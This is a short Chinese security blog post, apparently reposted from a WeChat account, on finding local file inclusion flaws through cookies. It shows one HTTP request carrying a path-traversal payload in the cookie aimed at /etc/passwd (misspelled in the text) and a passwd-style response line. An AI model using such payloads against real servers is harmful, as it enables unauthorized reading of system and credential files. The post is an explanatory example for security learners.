如何根据cookie查找本地文件读取vuln

2022年6月8日06:49:21评论20 views字数 224阅读0分44秒阅读模式

Request

GET /vulnerable.php HTTP/1.1

Cookie:usid=../../../../../../../../../../../../../etc/pasdwd

Response

HTTP/1.1 200 OK

...

Server Apache 2.4 root:fi3sER6:0:1:System Operator:/:/bin/ksh//

本文始发于微信公众号（Khan安全攻防实验室）：如何根据cookie查找本地文件读取vuln

科恩BinaryAI@ICSE2024论文解读｜基于大模型的二进制软件成分分析